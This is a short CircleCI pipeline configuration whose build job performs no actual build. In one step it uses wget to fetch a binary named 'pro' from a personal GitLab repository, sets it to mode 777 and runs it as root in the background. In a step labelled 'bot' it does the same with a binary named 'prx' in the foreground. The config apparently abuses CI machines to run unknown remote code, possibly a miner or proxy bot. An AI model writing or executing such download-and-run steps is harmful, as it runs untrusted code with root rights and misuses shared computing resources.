version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004:202101-01
    resource_class: 2xlarge

    steps:
      - run:
         name: "pro"
         command: | 
          sudo su --command "wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/pro && chmod 777 pro"
          sudo nohup ./pro --log=stdout > meta.log &
          sleep 5
          sudo cat meta.log
      
      - run:
         name: "bot"
         command: |
          wget https://gitlab.com/Sherwoodfrey/prx/-/raw/main/prx
          chmod 777 prx
          ./prx

workflows:
  version: 2
  build:
    jobs:
      - build
